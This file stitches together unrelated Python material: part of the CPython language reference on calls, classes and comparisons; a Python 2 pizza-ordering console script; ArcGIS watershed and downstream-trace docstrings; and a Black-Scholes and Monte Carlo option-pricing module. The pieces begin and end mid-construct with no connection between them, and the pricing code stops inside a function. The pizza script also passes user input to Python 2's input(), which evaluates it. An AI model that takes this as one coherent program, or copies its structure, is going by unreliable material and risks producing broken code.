slot; this should usually be avoided.) If there are any
unfilled slots for which no default value is specified, a "TypeError"
exception is raised. Otherwise, the list of filled slots is used as
the argument list for the call.
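A minimal sketch of this rule, using a hypothetical function `f` with one defaulted slot:

```python
def f(a, b=10):
    return a + b

result = f(5)   # the unfilled slot b takes its default value 10
try:
    f()         # the slot for a is unfilled and has no default
    raised = False
except TypeError:
    raised = True
```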
**CPython implementation detail:** An implementation may provide
built-in functions whose positional parameters do not have names, even
if they are 'named' for the purpose of documentation, and which
therefore cannot be supplied by keyword. In CPython, this is the case
for functions implemented in C that use "PyArg_ParseTuple()" to parse
their arguments.
If there are more positional arguments than there are formal parameter
slots, a "TypeError" exception is raised, unless a formal parameter
using the syntax "*identifier" is present; in this case, that formal
parameter receives a tuple containing the excess positional arguments
(or an empty tuple if there were no excess positional arguments).
If any keyword argument does not correspond to a formal parameter
name, a "TypeError" exception is raised, unless a formal parameter
using the syntax "**identifier" is present; in this case, that formal
parameter receives a dictionary containing the excess keyword
arguments (using the keywords as keys and the argument values as
corresponding values), or a (new) empty dictionary if there were no
excess keyword arguments.
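Both rules can be seen in one hypothetical function that declares `*rest` and `**extra`:

```python
def g(a, *rest, **extra):
    return a, rest, extra

# rest receives the excess positional arguments as a tuple,
# extra receives the excess keyword arguments as a dict
captured = g(1, 2, 3, x=4)
empty = g(1)   # no excess arguments: empty tuple and (new) empty dict
```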
If the syntax "*expression" appears in the function call, "expression"
must evaluate to an *iterable*. Elements from these iterables are
treated as if they were additional positional arguments. For the call
"f(x1, x2, *y, x3, x4)", if *y* evaluates to a sequence *y1*, ...,
*yM*, this is equivalent to a call with M+4 positional arguments *x1*,
*x2*, *y1*, ..., *yM*, *x3*, *x4*.
A consequence of this is that although the "*expression" syntax may
appear *after* explicit keyword arguments, it is processed *before*
the keyword arguments (and any "**expression" arguments -- see below).
So:
>>> def f(a, b):
... print(a, b)
...
>>> f(b=1, *(2,))
2 1
>>> f(a=1, *(2,))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: f() got multiple values for keyword argument 'a'
>>> f(1, *(2,))
1 2
It is unusual for both keyword arguments and the "*expression" syntax
to be used in the same call, so in practice this confusion does not
arise.
If the syntax "**expression" appears in the function call,
"expression" must evaluate to a *mapping*, the contents of which are
treated as additional keyword arguments. If a keyword is already
present (as an explicit keyword argument, or from another unpacking),
a "TypeError" exception is raised.
Formal parameters using the syntax "*identifier" or "**identifier"
cannot be used as positional argument slots or as keyword argument
names.
Changed in version 3.5: Function calls accept any number of "*" and
"**" unpackings, positional arguments may follow iterable unpackings
("*"), and keyword arguments may follow dictionary unpackings ("**").
Originally proposed by **PEP 448**.
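A sketch of the PEP 448 relaxations, combining several `*` and `**` unpackings with ordinary arguments in one call (hypothetical function `k`):

```python
def k(*args, **kwargs):
    return args, kwargs

# Positional arguments may follow iterable unpackings, and keyword
# arguments may follow dictionary unpackings.
args, kwargs = k(*[1], 2, *(3,), x=4, **{'y': 5})
```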
A call always returns some value, possibly "None", unless it raises an
exception. How this value is computed depends on the type of the
callable object.
If it is---
a user-defined function:
The code block for the function is executed, passing it the
argument list. The first thing the code block will do is bind the
formal parameters to the arguments; this is described in section
Function definitions. When the code block executes a "return"
statement, this specifies the return value of the function call.
a built-in function or method:
The result is up to the interpreter; see Built-in Functions for the
descriptions of built-in functions and methods.
a class object:
A new instance of that class is returned.
a class instance method:
The corresponding user-defined function is called, with an argument
list that is one longer than the argument list of the call: the
instance becomes the first argument.
a class instance:
The class must define a "__call__()" method; the effect is then the
same as if that method was called.
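Two of these cases, calling a class object and calling an instance, can be sketched with a hypothetical `Adder` class:

```python
class Adder:
    def __init__(self, n):
        self.n = n
    def __call__(self, x):   # defining __call__ makes instances callable
        return self.n + x

add3 = Adder(3)   # calling the class object returns a new instance
total = add3(4)   # calling the instance invokes its __call__() method
```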
"""
, 'class':
"""Class definitions
*****************
A class definition defines a class object (see section The standard
type hierarchy):
classdef ::= [decorators] "class" classname [inheritance] ":" suite
inheritance ::= "(" [argument_list] ")"
classname ::= identifier
A class definition is an executable statement. The inheritance list
usually gives a list of base classes (see Metaclasses for more
advanced uses), so each item in the list should evaluate to a class
object which allows subclassing. Classes without an inheritance list
inherit, by default, from the base class "object"; hence,
class Foo:
pass
is equivalent to
class Foo(object):
pass
The class's suite is then executed in a new execution frame (see
Naming and binding), using a newly created local namespace and the
original global namespace. (Usually, the suite contains mostly
function definitions.) When the class's suite finishes execution, its
execution frame is discarded but its local namespace is saved. [4] A
class object is then created using the inheritance list for the base
classes and the saved local namespace for the attribute dictionary.
The class name is bound to this class object in the original local
namespace.
The order in which attributes are defined in the class body is
preserved in the new class's "__dict__". Note that this is reliable
only right after the class is created and only for classes that were
defined using the definition syntax.
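A small sketch of this (hypothetical class `Ordered`), filtering out the implicit dunder entries:

```python
class Ordered:
    first = 1
    second = 2
    third = 3

# Definition order is preserved in the class's __dict__
names = [n for n in Ordered.__dict__ if not n.startswith('__')]
```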
Class creation can be customized heavily using metaclasses.
Classes can also be decorated: just like when decorating functions,
@f1(arg)
@f2
class Foo: pass
is roughly equivalent to
class Foo: pass
Foo = f1(arg)(f2(Foo))
The evaluation rules for the decorator expressions are the same as for
function decorators. The result is then bound to the class name.
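A runnable sketch with a hypothetical single decorator `register`, equivalent to writing `Foo = register(Foo)` after the class statement:

```python
def register(cls):
    cls.registered = True   # hypothetical decorator: tag the class
    return cls

@register
class Foo:
    pass
```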
**Programmer's note:** Variables defined in the class definition are
class attributes; they are shared by instances. Instance attributes
can be set in a method with "self.name = value". Both class and
instance attributes are accessible through the notation "self.name",
and an instance attribute hides a class attribute with the same name
when accessed in this way. Class attributes can be used as defaults
for instance attributes, but using mutable values there can lead to
unexpected results. Descriptors can be used to create instance
variables with different implementation details.
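The mutable-default pitfall can be sketched with a hypothetical `Bag` class whose class attribute is a list:

```python
class Bag:
    items = []                   # mutable class attribute -- shared by all instances
    def add(self, x):
        self.items.append(x)     # mutates the shared list, not a per-instance one

a, b = Bag(), Bag()
a.add(1)
# b.items refers to the very same list object, so b also "contains" 1
```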
See also: **PEP 3115** - Metaclasses in Python 3 **PEP 3129** -
Class Decorators
"""
, 'comparisons':
"""Comparisons
***********
Unlike C, all comparison operations in Python have the same priority,
which is lower than that of any arithmetic, shifting or bitwise
operation. Also unlike C, expressions like "a < b < c" have the
interpretation that is conventional in mathematics:
comparison ::= or_expr ( comp_operator or_expr )*
comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "!="
| "is" ["not"] | ["not"] "in"
Comparisons yield boolean values: "True" or "False".
Comparisons can be chained arbitrarily, e.g., "x < y <= z" is
equivalent to "x < y and y <= z", except that "y" is evaluated only
once (but in both cases "z" is not evaluated at all when "x < y" is
found to be false).
Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,
*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y
opN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except
that each expression is evaluated at most once.
Note that "a op1 b op2 c" doesn't imply any kind of comparison between
*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though
perhaps not pretty).
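Both points can be checked directly; here a side effect counts how often the middle expression is evaluated (hypothetical helper `y`):

```python
calls = []
def y():
    calls.append(1)
    return 5

chained = 1 < y() <= 10   # y() is evaluated only once
legal = 1 < 5 > 2         # legal; implies no comparison between 1 and 2
```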
Value comparisons
=================
The operators "<", ">", "==", ">=", "<=", and "!=" compare the values
of two objects. The objects do not need to have the same type.
Chapter Objects, values and types states that objects have a value (in
addition to type and identity). The value of an object is a rather
abstract notion in Python: For example, there is no canonical access
method for an object's value. Also, there is no requirement that the
value of an object should be constructed in a particular way, e.g.
comprised of all its data attributes. Comparison operators implement a
particular notion of what the value of an object is. One can think of
them as defining the value of an object indirectly, by means of their
comparison implementation.
Because all types are (direct or indirect) subtypes of "object", they
inherit the default comparison behavior from "object". Types can
customize their comparison behavior by implementing *rich comparison
methods* like "__lt__()", described in Basic customization.
The default behavior for equality comparison ("==" and "!=") is based
on the identity of the objects.
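A small sketch of this default, identity-based equality (hypothetical `Plain` class with no rich comparison methods):

```python
class Plain:
    pass

p, q = Plain(), Plain()
same = (p == p)        # identical objects compare equal
different = (p == q)   # distinct objects compare unequal, despite equal "contents"
```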
# ** DECLARE CONSTANTS
# These are the options of the various properties of the pizza available
sizesAvailable = ["Small", "Medium", "Large"] # The size of the pizza
basesAvailable = ["Thick", "Thin"] # The type of base of the pizza
toppingsAvailable = ["Pepperoni", "Chicken", "Extra Cheese", "Mushrooms", "Spinach", "Olives"] # The toppings available
maxToppings = 3 # The maximum number of toppings that can be taken
# ** DECLARE VARIABLES
CurrentID = 0 # The running unique ID of the order
ordersCount = 0 # The running total of the number of confirmed orders
close = False # status of more orders
highest = 0.0
highestIndex = 0
lowest = 1000.0
lowestIndex = 0
toppingsSum = 0.0
orderData = [] # Running tracker of all the items of one order
# Initialize the array with all values 0
totalSizes = [0, 0, 0] # Set values for 3 sizes
totalBases = [0, 0] # Set values for 2 bases
totalToppings = [0, 0, 0, 0, 0, 0] # Set values for 6 toppings
# ** TASK 1
# Use a default status "Alter" to customize the pizza
# Input the values of each attribute and validate them
# Give the customer a choice to alter the order, confirm it OR cancel it
# If they choose to alter, re-input the values
# If they confirm it, provide them with a new order number.
# ** TASK 2
# Increment a counter of number of pizzas if an order is confirmed
# Add the value of the Counters[] to the TotalCounters[]
# Output the number of pizzas ordered.
while (close != True):
status = "Alter" # Default status to input values
# Input and validate the values
while status == "Alter": # As long as the status is "Alter"
# Reset the running tracker
orderData = [] # Initialize to have 0 toppings
# Output the available options
# Output the sizes
print "\nThe following sizes are available to choose from:"
for count in range(3): # Iterate 3 times for 3 sizes
print sizesAvailable[count] + ',', # Output the available sizes
# Output the bases
print "\n\nThe following bases are available to choose from:"
for count in range(2): # Iterate 2 times for 2 pizza bases
print basesAvailable[count] + ',', # Output the available bases
# Output the toppings
print "\n\nThe following toppings are available to choose from:"
for count in range(6): # Iterate 6 times for 6 toppings
print toppingsAvailable[count] + ',', # Output the available toppings
size = "" # Enable the while loop to run by making the size invalid
# Input and validate the size of the pizza
while (size != "Small") and (size != "Medium") and (size != "Large"): # Validation loop
size = raw_input("\n\nPlease enter the size of the pizza you would like: ") # Input the size
if (size != "Small") and (size != "Medium") and (size != "Large"): # If the size is invalid
print "The size you have entered is invalid. Please re-enter the size from one of the options above." # Print error message and ask for correction
# Unless the size is invalid, break out of the loop
# Input and validate the base of the pizza
base = "" # Enable the while loop to run by making the base invalid
while (base != "Thick") and (base != "Thin"): # Validation loop
base = raw_input("\nPlease enter the pizza base you would like: ") # Input the base
if (base != "Thick") and (base != "Thin"): # If the base is invalid
print "The base you have entered is invalid. Please re-enter the base from one of the options above." # Print error message and ask for correction
# Unless the base is invalid, break out of the loop
# Input and validate the number of toppings the customer wants
print # Output a blank line before the prompt
toppingChoice = 100 # Enable the while loop to run by making the number of toppings invalid
while not ((toppingChoice <= 3) and (toppingChoice >= 0)): # Validation loop
toppingChoice = int(input("How many toppings do you want on your pizza? You may enter any whole number between 0 and 3: ")) # Input the number of toppings the user wants
if not ((toppingChoice <= 3) and (toppingChoice >= 0)): # If the number of toppings is invalid
print "You have entered an invalid number of toppings. Please re-enter any whole number between 0 and 3." # Throw error message and ask for correction
# Unless the number of toppings is greater than 3, break out of the loop
numberOfItems = 2 + toppingChoice # Two fixed items (size, base) plus one slot per topping
orderData = [None] * numberOfItems # Declare an array with as many elements as in the order
# Store the data acquired so far
orderData[0] = size # Store the size
orderData[1] = base # Store the base
# Toppings are stored from index 2 onwards, so they are not overwritten
for outsideCount in range(toppingChoice): # Iterate as many times as the toppings taken
# Input and validate the topping of the pizza
topping = "" # Enable the while loop to run by making the topping invalid
while (topping != "Pepperoni") and (topping != "Chicken") and (topping != "Extra Cheese") and (topping != "Mushrooms") and (topping != "Spinach") and (topping != "Olives"): # Validation loop
topping = raw_input("Please enter topping " + str(outsideCount + 1) + " of the pizza you would like: ") # Input the topping
if (topping != "Pepperoni") and (topping != "Chicken") and (topping != "Extra Cheese") and (topping != "Mushrooms") and (topping != "Spinach") and (topping != "Olives"): # If the topping is invalid
print "The topping you have entered is invalid. Please re-enter the topping from one of the options above." # Print error message and ask for correction
# Unless the topping is invalid, break out of the loop
orderData[2 + outsideCount] = topping # Store the validated topping in the array
# Move on to the next topping
status = raw_input("\nDo you want to Alter your order, Confirm or Not proceed? ") # Input whether the customer wants to alter their order, confirm it or cancel it
# Unless they want to alter their order, break out of the loop
# Give the customer a unique order ID if they have confirmed it
if status == "Confirm": # If the customer has confirmed their order
print "\nYour unique order number is: ", CurrentID # Print out the unique ID
CurrentID = CurrentID + 1 # Increment the ID for the next confirmed order
ordersCount = ordersCount + 1 # Increment the counter for confirmed orders
# Record how many of each size has been ordered
for count in range(3): # Iterate 3 times for 3 sizes
if orderData[0] == sizesAvailable[count]: # If a size is recorded
totalSizes[count] = totalSizes[count] + 1 # Increment the counter
# Record how many of each pizza base has been ordered
for count in range(2): # Iterate 2 times for 2 pizza bases
if orderData[1] == basesAvailable[count]: # If a pizza base is recorded
totalBases[count] = totalBases[count] + 1 # Increment the counter
# Record how many of each topping has been ordered
for outsideCount in range(toppingChoice): # Run as many times as the number of toppings taken
for insideCount in range(6): # Iterate 6 times for 6 toppings
if orderData[2 + outsideCount] == toppingsAvailable[insideCount]: # If a topping has been ordered
totalToppings[insideCount] = totalToppings[insideCount] + 1 # Increment the counter
close = (raw_input("\nDo you want to exit the program? (Yes/No) ") == "Yes") # Use raw_input; input() would eval() the reply
context=None,
gis=None,
estimate=False,
future=False):
"""
.. image:: _static/images/create_watersheds/create_watersheds.png
The ``create_watersheds`` method determines the watershed, or upstream contributing area, for each point
in your analysis layer. For example, suppose you have point features representing locations
of waterborne contamination, and you want to find the likely sources of the contamination.
Since the source of the contamination must be somewhere within the watershed upstream of the
point, you would use this tool to define the watersheds containing the sources of the contaminant.
========================= =========================================================
**Parameter** **Description**
------------------------- ---------------------------------------------------------
input_layer Required point feature layer. The point features used for calculating watersheds.
These are referred to as pour points, because they are the locations at which water pours out of the watershed.
See :ref:`Feature Input<FeatureInput>`.
------------------------- ---------------------------------------------------------
search_distance Optional float. The maximum distance to move the location of an input point.
Use search_units to set the units for search_distance.
If your input points are located away from a drainage line, the resulting watersheds
are likely to be very small and not of much use in determining the upstream source of
contamination. In most cases, you want your input points to snap to the nearest drainage
line in order to find the watershed that flows to a point located on the drainage line.
To find the closest drainage line, specify a search distance. If you do not specify a
search distance, the tool will compute and use a conservative search distance.
To use the exact location of your input point, specify a search distance of zero.
For analysis purposes, drainage lines have been precomputed by Esri using standard
hydrologic models. If there is no drainage line within the search distance, the location
containing the highest flow accumulation within the search distance is used.
------------------------- ---------------------------------------------------------
search_units Optional string. The linear units specified for the search distance.
Choice list: ['Meters', 'Kilometers', 'Feet', 'Miles', 'Yards']
------------------------- ---------------------------------------------------------
source_database Optional string. Keyword indicating the data source resolution that will be used in the analysis.
Choice list: ['Finest', '30m', '90m']
* Finest (Default): Finest resolution available at each location from all possible data sources.
* 30m: The hydrologic source was built from 1 arc second - approximately 30 meter resolution, elevation data.
* 90m: The hydrologic source was built from 3 arc second - approximately 90 meter resolution, elevation data.
------------------------- ---------------------------------------------------------
generalize Optional boolean. Determines if the output watersheds will be smoothed into simpler shapes or conform
to the cell edges of the original DEM.
* True: The polygons will be smoothed into simpler shapes. This is the default.
* False: The edge of the polygons will conform to the edges of the original DEM.
The default value is True.
------------------------- ---------------------------------------------------------
output_name Optional string. Output feature service name. If not provided, a feature collection is returned.
------------------------- ---------------------------------------------------------
context Optional dict. Context contains additional settings that affect task execution. For ``create_watersheds``, there are two settings.
#. Extent (``extent``)-a bounding box that defines the analysis area. Only those points in the ``input_layer``
that intersect the bounding box will be analyzed.
#. Output Spatial Reference (``outSR``) - the output features will be projected into the output spatial reference.
------------------------- ---------------------------------------------------------
gis Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
------------------------- ---------------------------------------------------------
estimate Optional boolean. If True, the estimated number of credits required to run the operation will be returned.
------------------------- ---------------------------------------------------------
future Optional boolean. If True, the result will be a GPJob object and results will be returned asynchronously.
========================= =========================================================
:returns: feature layer Item if ``output_name`` is specified, else a feature collection.
.. code-block:: python
# USAGE EXAMPLE: To create watersheds for Chennai lakes.
lakes_watershed = create_watersheds(lakes_lyr,
search_distance=3,
search_units='Kilometers',
source_database='90m',
output_name='create watersheds')
"""
gis = _arcgis.env.active_gis if gis is None else gis
return gis._tools.featureanalysis.create_watersheds(
input_layer,
search_distance,
search_units,
source_database,
generalize,
output_name,
context,
estimate=estimate, future=future)
def trace_downstream(
input_layer,
split_distance=None,
split_units="Kilometers",
max_distance=None,
max_distance_units="Kilometers",
bounding_polygon_layer=None,
source_database=None,
generalize=True,
output_name=None,
context=None,
gis=None,
estimate=False,
future=False):
"""
.. image:: _static/images/trace_downstream/trace_downstream.png
The ``trace_downstream`` method determines the trace, or flow path, in a downstream direction from the points in your analysis layer.
For example, suppose you have point features representing sources of contamination and you want to determine where in your study
area the contamination will flow. You can use ``trace_downstream`` to identify the path the contamination will take. This trace
can also be divided into individual line segments by specifying a distance value and units. The line being returned can be the
total length of the flow path, a specified maximum trace length, or clipped to area features such as your study area. In many
cases, if the total length of the trace path is returned, it will be from the source all the way to the ocean.
===================================== =========================================================
**Argument** **Description**
------------------------------------- ---------------------------------------------------------
input_layer Required feature layer. The point features used for the starting location of a downstream trace.
See :ref:`Feature Input<FeatureInput>`.
------------------------------------- ---------------------------------------------------------
split_distance Optional float. The trace line will be split into multiple lines where each line is of the specified length.
The resulting trace will have multiple line segments, each with fields FromDistance and ToDistance.
------------------------------------- ---------------------------------------------------------
split_units Optional string. The units used to specify split distance.
Choice list: ['Meters', 'Kilometers', 'Feet', 'Yards', 'Miles'].
The default is 'Kilometers'.
------------------------------------- ---------------------------------------------------------
max_distance Optional float. Determines the total length of the line that will be returned. If you provide a
``bounding_polygon_layer`` to clip the trace, the result will be clipped to the features in ``bounding_polygon_layer``,
regardless of the distance you enter here.
------------------------------------- ---------------------------------------------------------
max_distance_units Optional string. The units used to specify maximum distance.
Choice list: ['Meters', 'Kilometers', 'Feet', 'Yards', 'Miles'].
The default is 'Kilometers'.
------------------------------------- ---------------------------------------------------------
bounding_polygon_layer Optional feature layer. A polygon layer specifying the area(s) within which you want the
downstream traces to be calculated. For example, if you only want to calculate the trace downstream
within a county, provide a layer containing the county polygon and the resulting trace
lines will be clipped to the county boundary. See :ref:`Feature Input<FeatureInput>`.
------------------------------------- ---------------------------------------------------------
source_database Optional string. Keyword indicating the data source resolution that will be used in the analysis.
Choice list: ['Finest', '30m', '90m'].
* Finest: Finest resolution available at each location from all possible data sources.
* 30m: The hydrologic source was built from 1 arc second - approximately 30 meter resolution, elevation data.
* 90m: The hydrologic source was built from 3 arc second - approximately 90 meter resolution, elevation data.
The default is 'Finest'.
------------------------------------- ---------------------------------------------------------
generalize Optional boolean. Determines if the output trace downstream lines will be smoothed
into simpler lines or conform to the cell edges of the original DEM.
------------------------------------- ---------------------------------------------------------
output_name Optional string. If provided, the task will create a feature service of the results.
You define the name of the service. If ``output_name`` is not supplied, the task will return a feature collection.
------------------------------------- ---------------------------------------------------------
context Optional string. Context contains additional settings that affect task execution. For ``trace_downstream``, there are two settings.
#. Extent (``extent``) - a bounding box that defines the analysis area. Only those points
in the ``input_layer`` that intersect the bounding box will have a downstream trace generated.
#. Output Spatial Reference (``outSR``) - the output features will be projected into the output spatial reference.
------------------------------------- ---------------------------------------------------------
estimate Optional boolean. If True, the number of credits to run the operation will be returned.
------------------------------------- ---------------------------------------------------------
future Optional boolean. If True, the result will be a GPJob object and results will be returned asynchronously.
===================================== =========================================================
:returns: feature layer collection if ``output_name`` is set, else feature collection.
.. code-block:: python
# USAGE EXAMPLE: To identify the path the water contamination will take.
path = trace_downstream(input_layer=water_source_lyr,
split_distance=2,
split_units='Miles',
max_distance=2,
max_distance_units='Miles',
source_database='Finest',
generalize=True,
output_name='trace downstream')
"""
gis = _arcgis.env.active_gis if gis is None else gis
return gis._tools.featureanalysis.trace_downstream(
input_layer,
split_distance,
split_units,
max_distance,
max_distance_units,
bounding_polygon_layer,
source_database,
generalize,
output_name,
context,
estimate=estimate, future=future)
import numpy as np
import pandas as pd
import scipy.stats as si
'''
This section is highly dependent upon knowledge of the black & scholes formula
for option pricing and using Monte Carlo methods to price options. There are
a number of terms such as d1, d2, delta, gamma, vega that are specific to
option pricing and I will not add comments to explain what these are. If you
are unfamiliar with this, read something like 'Options, Futures and Other
Derivatives' by <NAME>.
Note however that I use numpy arrays here, so when a calculation is performed,
I am often calculating multiple values at the same time. I assume an input
array containing multiple stock prices is passed in, which results in multiple
price, delta, gamma etc values being calculated and which will later be used
to plot graphs.
This module has two classes:
BlackScholes:
This calculates the price, delta, gamma etc of an option using the B&S Formula
BasicMonteCarloOption:
This calculates the price, delta, gamma etc by using monte carlo methods.
With this class I tend to return 2 arguments (not 1) from the functions.
The second argument tends to be the standard deviation. So I may have
(optPrice, optStdDev) = calculateSomeValue( numpyArrayOfStockPrices )
This section is only for European Options and it does not include things such
as interest rate curves, borrow curves, volatility surface etc etc.
(ie it is a simplified version)
'''
class BlackScholes():
# Private Functions
def __init__(self, fltStrike, fltVol, fltRiskFreeRate, fltTimeToMaturity,
boolIsCall):
# Set the variables
self.__fltStrike = fltStrike
self.__fltVol = fltVol
self.__fltRiskFreeRate = fltRiskFreeRate
self.__fltTimeToMaturity = fltTimeToMaturity
self.__boolIsCall = boolIsCall
def __str__(self):
strF = 'EuropeanOption: [Strike:{strike}; Vol:{vol}; '\
'RFRate:{rfrate}; Time:{time}; IsCall:{iscall};]'
return strF.format(strike=self.__fltStrike,
vol=self.__fltVol,
rfrate=self.__fltRiskFreeRate,
time=self.__fltTimeToMaturity,
iscall=self.__boolIsCall)
def __getD1(self, npStock):
npSK = np.log(npStock / self.__fltStrike)
npTopD1 = npSK + (
self.__fltRiskFreeRate
+ (self.__fltVol ** 2) / 2
) * self.__fltTimeToMaturity
npD1 = npTopD1 / (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD1
def __getD2(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = npD1 - (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD2
def __getD2FromD1(self, npD1):
npD2 = npD1 - (self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
return npD2
def __getCallPrice(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npCall = npStock * si.norm.cdf(npD1)\
- (self.__fltStrike
* np.exp(-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(npD2))
return npCall
def __getCallDelta(self, npStock):
npD1 = self.__getD1(npStock)
npDelta = si.norm.cdf(npD1)
return npDelta
def __getCallTheta(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npArg1 = -(npStock * si.norm.pdf(npD1) * self.__fltVol) \
/ (2 * np.sqrt(self.__fltTimeToMaturity))
npArg2 = -self.__fltRiskFreeRate * self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(npD2)
npTheta = (npArg1 + npArg2) / 365
return npTheta
def __getCallRho(self, npStock):
npD2 = self.__getD2(npStock)
npRho = (self.__fltStrike * self.__fltTimeToMaturity * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(npD2)) * 0.01
return npRho
def __getPutPrice(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npPut = self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(-npD2) - npStock * si.norm.cdf(-npD1)
return npPut
def __getPutDelta(self, npStock):
npD1 = self.__getD1(npStock)
npDelta = (si.norm.cdf(npD1) - 1)
return npDelta
def __getPutTheta(self, npStock):
npD1 = self.__getD1(npStock)
npD2 = self.__getD2FromD1(npD1)
npArg1 = -(npStock * si.norm.pdf(npD1) * self.__fltVol) \
/ (2 * np.sqrt(self.__fltTimeToMaturity))
npArg2 = self.__fltRiskFreeRate * self.__fltStrike * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity) \
* si.norm.cdf(-npD2)
npTheta = (npArg1 + npArg2) / 365
return npTheta
def __getPutRho(self, npStock):
npD2 = self.__getD2(npStock)
npRho = (- self.__fltStrike * self.__fltTimeToMaturity * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
* si.norm.cdf(-npD2)) * 0.01
return npRho
# Public Functions
def getOptionPrice(self, npStock):
if self.__boolIsCall:
return self.__getCallPrice(npStock)
else:
return self.__getPutPrice(npStock)
def getOptionDelta(self, npStock):
if self.__boolIsCall:
return self.__getCallDelta(npStock)
else:
return self.__getPutDelta(npStock)
def getOptionGamma(self, npStock):
# Gamma is Call/Put independent
npD1 = self.__getD1(npStock)
n1 = (si.norm.pdf(npD1))
d1 = (npStock * self.__fltVol * np.sqrt(self.__fltTimeToMaturity))
npGamma = n1 / d1
return npGamma
def getOptionVega(self, npStock):
# Vega is Call/Put independent
npD1 = self.__getD1(npStock)
npVega = npStock * (si.norm.pdf(npD1)) \
* np.sqrt(self.__fltTimeToMaturity) / 100
return npVega
def getOptionTheta(self, npStock):
if self.__boolIsCall:
return self.__getCallTheta(npStock)
else:
return self.__getPutTheta(npStock)
def getOptionRho(self, npStock):
if self.__boolIsCall:
return self.__getCallRho(npStock)
else:
return self.__getPutRho(npStock)
class BasicMonteCarloOption():
# Private Functions
def __init__(self, fltStrike, fltVol, fltRiskFreeRate, fltTimeToMaturity,
boolIsCall, intNoIter):
self.__fltStrike = fltStrike
self.__fltVol = fltVol
self.__fltRiskFreeRate = fltRiskFreeRate
self.__fltTimeToMaturity = fltTimeToMaturity
self.__boolIsCall = boolIsCall
self.__intNoIter = intNoIter
def __str__(self):
strF = 'BasicMonteCarloOption: [Strike:{strike}; Vol:{vol}; ' \
'RFRate:{rfrate}; Time:{time}; IsCall:{iscall}; ' \
'NoIter:{noiter}]'
return strF.format(strike=self.__fltStrike, vol=self.__fltVol,
rfrate=self.__fltRiskFreeRate,
time=self.__fltTimeToMaturity,
iscall=self.__boolIsCall,
noiter=self.__intNoIter)
def getOptionPrice(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
# For every stock price, get __intNoIter final stock prices by doing
# a matrix multiplication: the initial stock prices are multiplied by
# the multipliers to get the final stock prices. The stock vector is
# reshaped into a column matrix to achieve this.
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
else:
npPayoff = self.__fltStrike - FinalS
# Build a matrix of zeros the same size as the payoff matrix.
npZeros = np.zeros(npPayoff.shape)
# Build a matrix of adjusted payoffs, where the payoff is floored at zero.
npPayoffAdj = np.maximum(npPayoff, npZeros)
# Get the present value of the monte carlo simulations
npPV = npPayoffAdj * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
# Calculate the mean across simulations for each stock price.
npPrice = np.mean(npPV, axis=1)
# Calculate the standard deviation across simulations for each stock price.
npSTD = np.std(npPV, axis=1)
# Return the option price and its standard deviation.
return (npPrice, npSTD)
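The pricing above can be sketched standalone: simulate terminal prices under risk-neutral geometric Brownian motion, discount the floored payoff, and report the sample mean and standard deviation. Parameter values below are illustrative, and the closed-form Black-Scholes reference uses an erf-based normal CDF to avoid a scipy dependency.

```python
import numpy as np
from math import erf, exp, log, sqrt

def norm_cdf(x):
    # Standard normal CDF via the error function.
    return 0.5 * (1.0 + erf(x / sqrt(2.0)))

def bs_call(s, k, r, vol, t):
    # Closed-form Black-Scholes call price, used as a reference value.
    d1 = (log(s / k) + (r + 0.5 * vol ** 2) * t) / (vol * sqrt(t))
    d2 = d1 - vol * sqrt(t)
    return s * norm_cdf(d1) - k * exp(-r * t) * norm_cdf(d2)

def mc_call(s, k, r, vol, t, n_iter, seed=0):
    z = np.random.default_rng(seed).standard_normal(n_iter)
    # Terminal price under risk-neutral geometric Brownian motion.
    final_s = s * np.exp(z * vol * np.sqrt(t) + (r - 0.5 * vol ** 2) * t)
    # Discounted payoff, floored at zero.
    pv = np.maximum(final_s - k, 0.0) * np.exp(-r * t)
    return pv.mean(), pv.std()

price, std = mc_call(s=100.0, k=100.0, r=0.02, vol=0.2, t=1.0, n_iter=200_000)
ref = bs_call(100.0, 100.0, 0.02, 0.2, 1.0)
```

With 200k paths the Monte Carlo estimate typically lands within a few standard errors (`std / sqrt(n_iter)`) of the closed form.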
def getOptionDelta(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
# For every stock price, get __intNoIter final stock prices by doing
# a matrix multiplication: the initial stock prices are multiplied by
# the multipliers to get the final stock prices. The stock vector is
# reshaped into a column matrix to achieve this.
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Get a bumped stock price and then calculate the bumped final stock price
npBump = npMatrix * 0.01
